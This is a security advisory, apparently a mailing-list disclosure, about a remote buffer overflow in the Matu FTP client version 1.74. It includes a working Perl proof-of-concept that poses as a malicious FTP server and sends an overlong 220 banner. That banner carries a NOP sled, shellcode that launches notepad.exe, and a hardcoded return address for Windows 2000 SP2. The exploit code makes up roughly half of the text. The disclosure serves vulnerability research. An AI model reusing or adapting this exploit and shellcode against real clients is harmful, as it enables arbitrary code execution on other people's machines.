Matu FTP remote buffer overflow vulnerability

[Kanatoko <anvil () jumperz net>]

Matu FTP remote buffer overflow vulnerability

/*---------------------------
 Description
---------------------------*/
Matu FTP is a Japanese FTP client software for Win32 Platform.
We found an exploitable buffer overflow problem in Matu FTP Version 1.74.
The buffer overflow occurs when a long string like

220 AAAAAAAAAAAAAAAAA.....AAAAAAAAAAAAAAA<CR><LF>

is received by Matu FTP in the beginning of an FTP session.
This vulnerability allows malicious FTP server to execute 
an arbitrary code on client hosts.


/*---------------------------
 Vendor Status
---------------------------*/
Notified with no response


/*---------------------------
 POC
---------------------------*/
This exploit code is invoked as an FTP server through inetd.

#!/usr/local/bin/perl

#------------------------------------------------------
# Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)
# ( run under inetd )
# written by Kanatoko <anvil () jumperz net>
# http://www.jumperz.net/
#------------------------------------------------------
$|=1;

        #egg written by UNYUN (http://www.shadowpenguin.org/)
$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";

        #egg_address = 0x0012F43C
$buf = "\x90" x 217;
$buf .= $egg;
$buf .= "A" x 2;
$buf .= "\x3C\xF4\x12\x00";
$buf .= "B" x 80;

print "220 $buf\r\n";

--

#sorry for the bad english

Kanatoko <anvil () jumperz net>
http://www.jumperz.net/(Japanese)